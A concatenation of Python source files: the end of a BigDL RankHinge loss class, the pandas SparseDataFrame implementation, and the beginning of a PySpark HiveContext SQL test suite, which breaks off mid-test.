>>> loss = RankHinge()
creating: createZooKerasRankHinge
"""
def __init__(self, margin=1.0, bigdl_type="float"):
super(RankHinge, self).__init__(None, bigdl_type, float(margin))
|
|
"""
Data structures for sparse float data. Life is made simpler by dealing only
with float64 data
"""
from __future__ import division
import warnings
import numpy as np
from pandas._libs.sparse import BlockIndex, get_blocks
import pandas.compat as compat
from pandas.compat import lmap
from pandas.compat.numpy import function as nv
from pandas.util._decorators import Appender
from pandas.core.dtypes.cast import find_common_type, maybe_upcast
from pandas.core.dtypes.common import ensure_platform_int, is_scipy_sparse
from pandas.core.dtypes.missing import isna, notna
import pandas.core.algorithms as algos
from pandas.core.arrays.sparse import SparseArray, SparseDtype
import pandas.core.common as com
from pandas.core.frame import DataFrame
import pandas.core.generic as generic
from pandas.core.index import Index, MultiIndex, ensure_index
import pandas.core.indexes.base as ibase
from pandas.core.internals import (
BlockManager, create_block_manager_from_arrays)
from pandas.core.internals.construction import extract_index, prep_ndarray
import pandas.core.ops as ops
from pandas.core.series import Series
from pandas.core.sparse.series import SparseSeries
# pylint: disable=E1101,E1103,W0231,E0202
_shared_doc_kwargs = dict(klass='SparseDataFrame')
class SparseDataFrame(DataFrame):
"""
DataFrame containing sparse floating point data in the form of SparseSeries
objects
Parameters
----------
data : same types as can be passed to DataFrame or scipy.sparse.spmatrix
.. versionchanged :: 0.23.0
If data is a dict, argument order is maintained for Python 3.6
and later.
index : array-like, optional
column : array-like, optional
default_kind : {'block', 'integer'}, default 'block'
Default sparse kind for converting Series to SparseSeries. Will not
override SparseSeries passed into constructor
default_fill_value : float
Default fill_value for converting Series to SparseSeries
(default: nan). Will not override SparseSeries passed in.
"""
_subtyp = 'sparse_frame'
def __init__(self, data=None, index=None, columns=None, default_kind=None,
default_fill_value=None, dtype=None, copy=False):
# pick up the defaults from the Sparse structures
if isinstance(data, SparseDataFrame):
if index is None:
index = data.index
if columns is None:
columns = data.columns
if default_fill_value is None:
default_fill_value = data.default_fill_value
if default_kind is None:
default_kind = data.default_kind
elif isinstance(data, (SparseSeries, SparseArray)):
if index is None:
index = data.index
if default_fill_value is None:
default_fill_value = data.fill_value
if columns is None and hasattr(data, 'name'):
columns = [data.name]
if columns is None:
raise Exception("cannot pass a series w/o a name or columns")
data = {columns[0]: data}
if default_fill_value is None:
default_fill_value = np.nan
if default_kind is None:
default_kind = 'block'
self._default_kind = default_kind
self._default_fill_value = default_fill_value
if is_scipy_sparse(data):
mgr = self._init_spmatrix(data, index, columns, dtype=dtype,
fill_value=default_fill_value)
elif isinstance(data, dict):
mgr = self._init_dict(data, index, columns, dtype=dtype)
elif isinstance(data, (np.ndarray, list)):
mgr = self._init_matrix(data, index, columns, dtype=dtype)
elif isinstance(data, SparseDataFrame):
mgr = self._init_mgr(data._data,
dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif isinstance(data, DataFrame):
mgr = self._init_dict(data, data.index, data.columns, dtype=dtype)
elif isinstance(data, Series):
mgr = self._init_dict(data.to_frame(), data.index,
columns=None, dtype=dtype)
elif isinstance(data, BlockManager):
mgr = self._init_mgr(data, axes=dict(index=index, columns=columns),
dtype=dtype, copy=copy)
elif data is None:
data = DataFrame()
if index is None:
index = Index([])
else:
index = ensure_index(index)
if columns is None:
columns = Index([])
else:
for c in columns:
data[c] = SparseArray(np.nan, index=index,
kind=self._default_kind,
fill_value=self._default_fill_value)
mgr = to_manager(data, columns, index)
if dtype is not None:
mgr = mgr.astype(dtype)
else:
msg = ('SparseDataFrame called with unknown type "{data_type}" '
'for data argument')
raise TypeError(msg.format(data_type=type(data).__name__))
generic.NDFrame.__init__(self, mgr)
@property
def _constructor(self):
return SparseDataFrame
_constructor_sliced = SparseSeries
def _init_dict(self, data, index, columns, dtype=None):
# pre-filter out columns if we passed it
if columns is not None:
columns = ensure_index(columns)
data = {k: v for k, v in compat.iteritems(data) if k in columns}
else:
keys = com.dict_keys_to_ordered_list(data)
columns = Index(keys)
if index is None:
index = extract_index(list(data.values()))
def sp_maker(x):
return SparseArray(x, kind=self._default_kind,
fill_value=self._default_fill_value,
copy=True, dtype=dtype)
sdict = {}
for k, v in compat.iteritems(data):
if isinstance(v, Series):
# Force alignment, no copy necessary
if not v.index.equals(index):
v = v.reindex(index)
if not isinstance(v, SparseSeries):
v = sp_maker(v.values)
elif isinstance(v, SparseArray):
v = v.copy()
else:
if isinstance(v, dict):
v = [v.get(i, np.nan) for i in index]
v = sp_maker(v)
if index is not None and len(v) != len(index):
msg = "Length of passed values is {}, index implies {}"
raise ValueError(msg.format(len(v), len(index)))
sdict[k] = v
if len(columns.difference(sdict)):
# TODO: figure out how to handle this case, all nan's?
# add in any other columns we want to have (completeness)
nan_arr = np.empty(len(index), dtype='float64')
nan_arr.fill(np.nan)
nan_arr = SparseArray(nan_arr, kind=self._default_kind,
fill_value=self._default_fill_value,
copy=False)
sdict.update((c, nan_arr) for c in columns if c not in sdict)
return to_manager(sdict, columns, index)
def _init_matrix(self, data, index, columns, dtype=None):
"""
Init self from ndarray or list of lists.
"""
data = prep_ndarray(data, copy=False)
index, columns = self._prep_index(data, index, columns)
data = {idx: data[:, i] for i, idx in enumerate(columns)}
return self._init_dict(data, index, columns, dtype)
def _init_spmatrix(self, data, index, columns, dtype=None,
fill_value=None):
"""
Init self from scipy.sparse matrix.
"""
index, columns = self._prep_index(data, index, columns)
data = data.tocoo()
N = len(index)
# Construct a dict of SparseSeries
sdict = {}
values = Series(data.data, index=data.row, copy=False)
for col, rowvals in values.groupby(data.col):
# get_blocks expects int32 row indices in sorted order
rowvals = rowvals.sort_index()
rows = rowvals.index.values.astype(np.int32)
blocs, blens = get_blocks(rows)
sdict[columns[col]] = SparseSeries(
rowvals.values, index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, blocs, blens))
# Add any columns that were empty and thus not grouped on above
sdict.update({column: SparseSeries(index=index,
fill_value=fill_value,
sparse_index=BlockIndex(N, [], []))
for column in columns
if column not in sdict})
return self._init_dict(sdict, index, columns, dtype)
def _prep_index(self, data, index, columns):
N, K = data.shape
if index is None:
index = ibase.default_index(N)
if columns is None:
columns = ibase.default_index(K)
if len(columns) != K:
raise ValueError('Column length mismatch: {columns} vs. {K}'
.format(columns=len(columns), K=K))
if len(index) != N:
raise ValueError('Index length mismatch: {index} vs. {N}'
.format(index=len(index), N=N))
return index, columns
def to_coo(self):
"""
Return the contents of the frame as a sparse SciPy COO matrix.
.. versionadded:: 0.20.0
Returns
-------
coo_matrix : scipy.sparse.spmatrix
If the caller is heterogeneous and contains booleans or objects,
the result will be of dtype=object. See Notes.
Notes
-----
The dtype will be the lowest-common-denominator type (implicit
upcasting); that is to say if the dtypes (even of numeric types)
are mixed, the one that accommodates all will be chosen.
e.g. If the dtypes are float16 and float32, dtype will be upcast to
float32. By numpy.find_common_type convention, mixing int64 and
and uint64 will result in a float64 dtype.
"""
try:
from scipy.sparse import coo_matrix
except ImportError:
raise ImportError('Scipy is not installed')
dtype = find_common_type(self.dtypes)
if isinstance(dtype, SparseDtype):
dtype = dtype.subtype
cols, rows, datas = [], [], []
for col, name in enumerate(self):
s = self[name]
row = s.sp_index.to_int_index().indices
cols.append(np.repeat(col, len(row)))
rows.append(row)
datas.append(s.sp_values.astype(dtype, copy=False))
cols = np.concatenate(cols)
rows = np.concatenate(rows)
datas = np.concatenate(datas)
return coo_matrix((datas, (rows, cols)), shape=self.shape)
def __array_wrap__(self, result):
return self._constructor(
result, index=self.index, columns=self.columns,
default_kind=self._default_kind,
default_fill_value=self._default_fill_value).__finalize__(self)
def __getstate__(self):
# pickling
return dict(_typ=self._typ, _subtyp=self._subtyp, _data=self._data,
_default_fill_value=self._default_fill_value,
_default_kind=self._default_kind)
def _unpickle_sparse_frame_compat(self, state):
"""
Original pickle format
"""
series, cols, idx, fv, kind = state
if not isinstance(cols, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
columns = _unpickle_array(cols)
else:
columns = cols
if not isinstance(idx, Index): # pragma: no cover
from pandas.io.pickle import _unpickle_array
index = _unpickle_array(idx)
else:
index = idx
series_dict = DataFrame()
for col, (sp_index, sp_values) in compat.iteritems(series):
series_dict[col] = SparseSeries(sp_values, sparse_index=sp_index,
fill_value=fv)
self._data = to_manager(series_dict, columns, index)
self._default_fill_value = fv
self._default_kind = kind
def to_dense(self):
"""
Convert to dense DataFrame
Returns
-------
df : DataFrame
"""
data = {k: v.to_dense() for k, v in compat.iteritems(self)}
return DataFrame(data, index=self.index, columns=self.columns)
def _apply_columns(self, func):
"""
Get new SparseDataFrame applying func to each columns
"""
new_data = {col: func(series)
for col, series in compat.iteritems(self)}
return self._constructor(
data=new_data, index=self.index, columns=self.columns,
default_fill_value=self.default_fill_value).__finalize__(self)
def astype(self, dtype):
return self._apply_columns(lambda x: x.astype(dtype))
def copy(self, deep=True):
"""
Make a copy of this SparseDataFrame
"""
result = super(SparseDataFrame, self).copy(deep=deep)
result._default_fill_value = self._default_fill_value
result._default_kind = self._default_kind
return result
@property
def default_fill_value(self):
return self._default_fill_value
@property
def default_kind(self):
return self._default_kind
@property
def density(self):
"""
Ratio of non-sparse points to total (dense) data points
represented in the frame
"""
tot_nonsparse = sum(ser.sp_index.npoints
for _, ser in compat.iteritems(self))
tot = len(self.index) * len(self.columns)
return tot_nonsparse / float(tot)
def fillna(self, value=None, method=None, axis=0, inplace=False,
limit=None, downcast=None):
new_self = super(SparseDataFrame,
self).fillna(value=value, method=method, axis=axis,
inplace=inplace, limit=limit,
downcast=downcast)
if not inplace:
self = new_self
# set the fill value if we are filling as a scalar with nothing special
# going on
if (value is not None and value == value and method is None and
limit is None):
self._default_fill_value = value
if not inplace:
return self
# ----------------------------------------------------------------------
# Support different internal representation of SparseDataFrame
def _sanitize_column(self, key, value, **kwargs):
"""
Creates a new SparseArray from the input value.
Parameters
----------
key : object
value : scalar, Series, or array-like
kwargs : dict
Returns
-------
sanitized_column : SparseArray
"""
def sp_maker(x, index=None):
return SparseArray(x, index=index,
fill_value=self._default_fill_value,
kind=self._default_kind)
if isinstance(value, SparseSeries):
clean = value.reindex(self.index).as_sparse_array(
fill_value=self._default_fill_value, kind=self._default_kind)
elif isinstance(value, SparseArray):
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = value
elif hasattr(value, '__iter__'):
if isinstance(value, Series):
clean = value.reindex(self.index)
if not isinstance(value, SparseSeries):
clean = sp_maker(clean)
else:
if len(value) != len(self.index):
raise AssertionError('Length of values does not match '
'length of index')
clean = sp_maker(value)
# Scalar
else:
clean = sp_maker(value, self.index)
# always return a SparseArray!
return clean
def get_value(self, index, col, takeable=False):
"""
Quickly retrieve single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
takeable : interpret the index/col as indexers, default False
Returns
-------
value : scalar value
"""
warnings.warn("get_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._get_value(index, col, takeable=takeable)
def _get_value(self, index, col, takeable=False):
if takeable is True:
series = self._iget_item_cache(col)
else:
series = self._get_item_cache(col)
return series._get_value(index, takeable=takeable)
_get_value.__doc__ = get_value.__doc__
def set_value(self, index, col, value, takeable=False):
"""
Put single value at passed column and index
.. deprecated:: 0.21.0
Please use .at[] or .iat[] accessors.
Parameters
----------
index : row label
col : column label
value : scalar value
takeable : interpret the index/col as indexers, default False
Notes
-----
This method *always* returns a new object. It is currently not
particularly efficient (and potentially very expensive) but is provided
for API compatibility with DataFrame
Returns
-------
frame : DataFrame
"""
warnings.warn("set_value is deprecated and will be removed "
"in a future release. Please use "
".at[] or .iat[] accessors instead", FutureWarning,
stacklevel=2)
return self._set_value(index, col, value, takeable=takeable)
def _set_value(self, index, col, value, takeable=False):
dense = self.to_dense()._set_value(
index, col, value, takeable=takeable)
return dense.to_sparse(kind=self._default_kind,
fill_value=self._default_fill_value)
_set_value.__doc__ = set_value.__doc__
def _slice(self, slobj, axis=0, kind=None):
if axis == 0:
new_index = self.index[slobj]
new_columns = self.columns
else:
new_index = self.index
new_columns = self.columns[slobj]
return self.reindex(index=new_index, columns=new_columns)
def xs(self, key, axis=0, copy=False):
"""
Returns a row (cross-section) from the SparseDataFrame as a Series
object.
Parameters
----------
key : some index contained in the index
Returns
-------
xs : Series
"""
if axis == 1:
data = self[key]
return data
i = self.index.get_loc(key)
data = self.take([i]).get_values()[0]
return Series(data, index=self.columns)
# ----------------------------------------------------------------------
# Arithmetic-related methods
def _combine_frame(self, other, func, fill_value=None, level=None):
if level is not None:
raise NotImplementedError("'level' argument is not supported")
this, other = self.align(other, join='outer', level=level, copy=False)
new_index, new_columns = this.index, this.columns
if self.empty and other.empty:
return self._constructor(index=new_index).__finalize__(self)
new_data = {}
if fill_value is not None:
# TODO: be a bit more intelligent here
for col in new_columns:
if col in this and col in other:
dleft = this[col].to_dense()
dright = other[col].to_dense()
result = dleft._binop(dright, func, fill_value=fill_value)
result = result.to_sparse(fill_value=this[col].fill_value)
new_data[col] = result
else:
for col in new_columns:
if col in this and col in other:
new_data[col] = func(this[col], other[col])
new_fill_value = self._get_op_result_fill_value(other, func)
return self._constructor(data=new_data, index=new_index,
columns=new_columns,
default_fill_value=new_fill_value
).__finalize__(self)
def _combine_match_index(self, other, func, level=None):
new_data = {}
if level is not None:
raise NotImplementedError("'level' argument is not supported")
this, other = self.align(other, join='outer', axis=0, level=level,
copy=False)
for col, series in compat.iteritems(this):
new_data[col] = func(series.values, other.values)
fill_value = self._get_op_result_fill_value(other, func)
return self._constructor(
new_data, index=this.index, columns=self.columns,
default_fill_value=fill_value).__finalize__(self)
def _combine_match_columns(self, other, func, level=None):
# patched version of DataFrame._combine_match_columns to account for
# NumPy circumventing __rsub__ with float64 types, e.g.: 3.0 - series,
# where 3.0 is numpy.float64 and series is a SparseSeries. Still
# possible for this to happen, which is bothersome
if level is not None:
raise NotImplementedError("'level' argument is not supported")
left, right = self.align(other, join='outer', axis=1, level=level,
copy=False)
assert left.columns.equals(right.index)
new_data = {}
for col in left.columns:
new_data[col] = func(left[col], float(right[col]))
return self._constructor(
new_data, index=left.index, columns=left.columns,
default_fill_value=self.default_fill_value).__finalize__(self)
def _combine_const(self, other, func):
return self._apply_columns(lambda x: func(x, other))
def _get_op_result_fill_value(self, other, func):
own_default = self.default_fill_value
if isinstance(other, DataFrame):
# i.e. called from _combine_frame
other_default = getattr(other, 'default_fill_value', np.nan)
# if the fill values are the same use them? or use a valid one
if own_default == other_default:
# TOOD: won't this evaluate as False if both are np.nan?
fill_value = own_default
elif np.isnan(own_default) and not np.isnan(other_default):
fill_value = other_default
elif not np.isnan(own_default) and np.isnan(other_default):
fill_value = own_default
else:
fill_value = None
elif isinstance(other, SparseSeries):
# i.e. called from _combine_match_index
# fill_value is a function of our operator
if isna(other.fill_value) or isna(own_default):
fill_value = np.nan
else:
fill_value = func(np.float64(own_default),
np.float64(other.fill_value))
else:
raise NotImplementedError(type(other))
return fill_value
def _reindex_index(self, index, method, copy, level, fill_value=np.nan,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if self.index.equals(index):
if copy:
return self.copy()
else:
return self
if len(self.index) == 0:
return self._constructor(
index=index, columns=self.columns).__finalize__(self)
indexer = self.index.get_indexer(index, method, limit=limit)
indexer = ensure_platform_int(indexer)
mask = indexer == -1
need_mask = mask.any()
new_series = {}
for col, series in self.iteritems():
if mask.all():
continue
values = series.values
# .take returns SparseArray
new = values.take(indexer)
if need_mask:
new = new.values
# convert integer to float if necessary. need to do a lot
# more than that, handle boolean etc also
new, fill_value = maybe_upcast(new, fill_value=fill_value)
np.putmask(new, mask, fill_value)
new_series[col] = new
return self._constructor(
new_series, index=index, columns=self.columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_columns(self, columns, method, copy, level, fill_value=None,
limit=None, takeable=False):
if level is not None:
raise TypeError('Reindex by level not supported for sparse')
if notna(fill_value):
raise NotImplementedError("'fill_value' argument is not supported")
if limit:
raise NotImplementedError("'limit' argument is not supported")
if method is not None:
raise NotImplementedError("'method' argument is not supported")
# TODO: fill value handling
sdict = {k: v for k, v in compat.iteritems(self) if k in columns}
return self._constructor(
sdict, index=self.index, columns=columns,
default_fill_value=self._default_fill_value).__finalize__(self)
def _reindex_with_indexers(self, reindexers, method=None, fill_value=None,
limit=None, copy=False, allow_dups=False):
if method is not None or limit is not None:
raise NotImplementedError("cannot reindex with a method or limit "
"with sparse")
if fill_value is None:
fill_value = np.nan
reindexers = {self._get_axis_number(a): val
for (a, val) in compat.iteritems(reindexers)}
index, row_indexer = reindexers.get(0, (None, None))
columns, col_indexer = reindexers.get(1, (None, None))
if columns is None:
columns = self.columns
new_arrays = {}
for col in columns:
if col not in self:
continue
if row_indexer is not None:
new_arrays[col] = algos.take_1d(self[col].get_values(),
row_indexer,
fill_value=fill_value)
else:
new_arrays[col] = self[col]
return self._constructor(new_arrays, index=index,
columns=columns).__finalize__(self)
def _join_compat(self, other, on=None, how='left', lsuffix='', rsuffix='',
sort=False):
if on is not None:
raise NotImplementedError("'on' keyword parameter is not yet "
"implemented")
return self._join_index(other, how, lsuffix, rsuffix)
def _join_index(self, other, how, lsuffix, rsuffix):
if isinstance(other, Series):
if other.name is None:
raise ValueError('Other Series must have a name')
other = SparseDataFrame(
{other.name: other},
default_fill_value=self._default_fill_value)
join_index = self.index.join(other.index, how=how)
this = self.reindex(join_index)
other = other.reindex(join_index)
this, other = this._maybe_rename_join(other, lsuffix, rsuffix)
from pandas import concat
return concat([this, other], axis=1, verify_integrity=True)
def _maybe_rename_join(self, other, lsuffix, rsuffix):
to_rename = self.columns.intersection(other.columns)
if len(to_rename) > 0:
if not lsuffix and not rsuffix:
raise ValueError('columns overlap but no suffix specified: '
'{to_rename}'.format(to_rename=to_rename))
def lrenamer(x):
if x in to_rename:
return '{x}{lsuffix}'.format(x=x, lsuffix=lsuffix)
return x
def rrenamer(x):
if x in to_rename:
return '{x}{rsuffix}'.format(x=x, rsuffix=rsuffix)
return x
this = self.rename(columns=lrenamer)
other = other.rename(columns=rrenamer)
else:
this = self
return this, other
def transpose(self, *args, **kwargs):
"""
Returns a DataFrame with the rows/columns switched.
"""
nv.validate_transpose(args, kwargs)
return self._constructor(
self.values.T, index=self.columns, columns=self.index,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
T = property(transpose)
@Appender(DataFrame.count.__doc__)
def count(self, axis=0, **kwds):
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.count(), axis=axis)
def cumsum(self, axis=0, *args, **kwargs):
"""
Return SparseDataFrame of cumulative sums over requested axis.
Parameters
----------
axis : {0, 1}
0 for row-wise, 1 for column-wise
Returns
-------
y : SparseDataFrame
"""
nv.validate_cumsum(args, kwargs)
if axis is None:
axis = self._stat_axis_number
return self.apply(lambda x: x.cumsum(), axis=axis)
@Appender(generic._shared_docs['isna'] % _shared_doc_kwargs)
def isna(self):
return self._apply_columns(lambda x: x.isna())
isnull = isna
@Appender(generic._shared_docs['notna'] % _shared_doc_kwargs)
def notna(self):
return self._apply_columns(lambda x: x.notna())
notnull = notna
def apply(self, func, axis=0, broadcast=None, reduce=None,
result_type=None):
"""
Analogous to DataFrame.apply, for SparseDataFrame
Parameters
----------
func : function
Function to apply to each column
axis : {0, 1, 'index', 'columns'}
broadcast : bool, default False
For aggregation functions, return object of same size with values
propagated
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='broadcast'.
reduce : boolean or None, default None
Try to apply reduction procedures. If the DataFrame is empty,
apply will use reduce to determine whether the result should be a
Series or a DataFrame. If reduce is None (the default), apply's
return value will be guessed by calling func an empty Series (note:
while guessing, exceptions raised by func will be ignored). If
reduce is True a Series will always be returned, and if False a
DataFrame will always be returned.
.. deprecated:: 0.23.0
This argument will be removed in a future version, replaced
by result_type='reduce'.
result_type : {'expand', 'reduce', 'broadcast, None}
These only act when axis=1 {columns}:
* 'expand' : list-like results will be turned into columns.
* 'reduce' : return a Series if possible rather than expanding
list-like results. This is the opposite to 'expand'.
* 'broadcast' : results will be broadcast to the original shape
of the frame, the original index & columns will be retained.
The default behaviour (None) depends on the return value of the
applied function: list-like results will be returned as a Series
of those. However if the apply function returns a Series these
are expanded to columns.
.. versionadded:: 0.23.0
Returns
-------
applied : Series or SparseDataFrame
"""
if not len(self.columns):
return self
axis = self._get_axis_number(axis)
if isinstance(func, np.ufunc):
new_series = {}
for k, v in compat.iteritems(self):
applied = func(v)
applied.fill_value = func(v.fill_value)
new_series[k] = applied
return self._constructor(
new_series, index=self.index, columns=self.columns,
default_fill_value=self._default_fill_value,
default_kind=self._default_kind).__finalize__(self)
from pandas.core.apply import frame_apply
op = frame_apply(self,
func=func,
axis=axis,
reduce=reduce,
broadcast=broadcast,
result_type=result_type)
return op.get_result()
def applymap(self, func):
"""
Apply a function to a DataFrame that is intended to operate
elementwise, i.e. like doing map(func, series) for each series in the
DataFrame
Parameters
----------
func : function
Python function, returns a single value from a single value
Returns
-------
applied : DataFrame
"""
return self.apply(lambda x: lmap(func, x))
def to_manager(sdf, columns, index):
""" create and return the block manager from a dataframe of series,
columns, index
"""
# from BlockManager perspective
axes = [ensure_index(columns), ensure_index(index)]
return create_block_manager_from_arrays(
[sdf[c] for c in columns], columns, axes)
def stack_sparse_frame(frame):
"""
Only makes sense when fill_value is NaN
"""
lengths = [s.sp_index.npoints for _, s in compat.iteritems(frame)]
nobs = sum(lengths)
# this is pretty fast
minor_codes = np.repeat(np.arange(len(frame.columns)), lengths)
inds_to_concat = []
vals_to_concat = []
# TODO: Figure out whether this can be reached.
# I think this currently can't be reached because you can't build a
# SparseDataFrame with a non-np.NaN fill value (fails earlier).
for _, series in compat.iteritems(frame):
if not np.isnan(series.fill_value):
raise TypeError('This routine assumes NaN fill value')
int_index = series.sp_index.to_int_index()
inds_to_concat.append(int_index.indices)
vals_to_concat.append(series.sp_values)
major_codes = np.concatenate(inds_to_concat)
stacked_values = np.concatenate(vals_to_concat)
index = MultiIndex(levels=[frame.index, frame.columns],
codes=[major_codes, minor_codes],
verify_integrity=False)
lp = DataFrame(stacked_values.reshape((nobs, 1)), index=index,
columns=['foo'])
return lp.sort_index(level=0)
def homogenize(series_dict):
"""
Conform a set of SparseSeries (with NaN fill_value) to a common SparseIndex
corresponding to the locations where they all have data
Parameters
----------
series_dict : dict or DataFrame
Notes
-----
Using the dumbest algorithm I could think of. Should put some more thought
into this
Returns
-------
homogenized : dict of SparseSeries
"""
index = None
need_reindex = False
for _, series in compat.iteritems(series_dict):
if not np.isnan(series.fill_value):
raise TypeError('this method is only valid with NaN fill values')
if index is None:
index = series.sp_index
elif not series.sp_index.equals(index):
need_reindex = True
index = index.intersect(series.sp_index)
if need_reindex:
output = {}
for name, series in compat.iteritems(series_dict):
if not series.sp_index.equals(index):
series = series.sparse_reindex(index)
output[name] = series
else:
output = series_dict
return output
# use unaccelerated ops for sparse objects
ops.add_flex_arithmetic_methods(SparseDataFrame)
ops.add_special_arithmetic_methods(SparseDataFrame)
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shutil
import sys
import tempfile
import unittest
try:
from importlib import reload # Python 3.4+ only.
except ImportError:
# Otherwise, we will stick to Python 2's built-in reload.
pass
import py4j
from pyspark import HiveContext, Row
from pyspark.sql.types import *
from pyspark.sql.window import Window
from pyspark.testing.utils import ReusedPySparkTestCase
class HiveContextSQLTests(ReusedPySparkTestCase):
@classmethod
def setUpClass(cls):
ReusedPySparkTestCase.setUpClass()
cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
cls.hive_available = True
try:
cls.sc._jvm.org.apache.hadoop.hive.conf.HiveConf()
except py4j.protocol.Py4JError:
cls.hive_available = False
except TypeError:
cls.hive_available = False
os.unlink(cls.tempdir.name)
if cls.hive_available:
cls.spark = HiveContext._createForTesting(cls.sc)
cls.testData = [Row(key=i, value=str(i)) for i in range(100)]
cls.df = cls.sc.parallelize(cls.testData).toDF()
def setUp(self):
if not self.hive_available:
self.skipTest("Hive is not available.")
@classmethod
def tearDownClass(cls):
ReusedPySparkTestCase.tearDownClass()
shutil.rmtree(cls.tempdir.name, ignore_errors=True)
def test_save_and_load_table(self):
df = self.df
tmpPath = tempfile.mkdtemp()
shutil.rmtree(tmpPath)
df.write.saveAsTable("savedJsonTable", "json", "append", path=tmpPath)
actual = self.spark.createExternalTable("externalJsonTable", tmpPath, "json")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE externalJsonTable")
df.write.saveAsTable("savedJsonTable", "json", "overwrite", path=tmpPath)
schema = StructType([StructField("value", StringType(), True)])
actual = self.spark.createExternalTable("externalJsonTable", source="json",
schema=schema, path=tmpPath,
noUse="this options will not be used")
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.select("value").collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
defaultDataSourceName = self.spark.getConf("spark.sql.sources.default",
"org.apache.spark.sql.parquet")
self.spark.sql("SET spark.sql.sources.default=org.apache.spark.sql.json")
df.write.saveAsTable("savedJsonTable", path=tmpPath, mode="overwrite")
actual = self.spark.createExternalTable("externalJsonTable", path=tmpPath)
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM savedJsonTable").collect()))
self.assertEqual(sorted(df.collect()),
sorted(self.spark.sql("SELECT * FROM externalJsonTable").collect()))
self.assertEqual(sorted(df.collect()), sorted(actual.collect()))
self.spark.sql("DROP TABLE savedJsonTable")
self.spark.sql("DROP TABLE externalJsonTable")
self.spark.sql("SET spark.sql.sources.default=" + defaultDataSourceName)
shutil.rmtree(tmpPath)
def test_window_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.partitionBy("value").orderBy("key")
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 1, 1, 1, 1, 1),
("2", 1, 1, 1, 3, 1, 1, 1, 1),
("2", 1, 2, 1, 3, 2, 1, 1, 1),
("2", 2, 2, 2, 3, 3, 3, 2, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_without_partitionBy(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
w = Window.orderBy("key", df.value)
from pyspark.sql import functions as F
sel = df.select(df.value, df.key,
F.max("key").over(w.rowsBetween(0, 1)),
F.min("key").over(w.rowsBetween(0, 1)),
F.count("key").over(w.rowsBetween(float('-inf'), float('inf'))),
F.row_number().over(w),
F.rank().over(w),
F.dense_rank().over(w),
F.ntile(2).over(w))
rs = sorted(sel.collect())
expected = [
("1", 1, 1, 1, 4, 1, 1, 1, 1),
("2", 1, 1, 1, 4, 2, 2, 2, 1),
("2", 1, 2, 1, 4, 3, 2, 2, 2),
("2", 2, 2, 2, 4, 4, 4, 3, 2)
]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_window_functions_cumulative_sum(self):
df = self.spark.createDataFrame([("one", 1), ("two", 2)], ["key", "value"])
from pyspark.sql import functions as F
# Test cumulative sum
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values less than JVM's Long.MinValue and make sure we don't overflow
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.unboundedPreceding - 1, 0)))
rs = sorted(sel.collect())
expected = [("one", 1), ("two", 3)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
# Test boundary values greater than JVM's Long.MaxValue and make sure we don't overflow
frame_end = Window.unboundedFollowing + 1
sel = df.select(
df.key,
F.sum(df.value).over(Window.rowsBetween(Window.currentRow, frame_end)))
rs = sorted(sel.collect())
expected = [("one", 3), ("two", 2)]
for r, ex in zip(rs, expected):
self.assertEqual(tuple(r), ex[:len(r)])
def test_collect_functions(self):
df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
from pyspark.sql import functions
self.assertEqual(
sorted(df.select(functions.collect_set(df.key).alias('r')).collect()[0].r),
[1, 2])
self.assertEqual(
sorted(df.select(functions.collect_list(df.key).alias('r')).collect()[0].r),
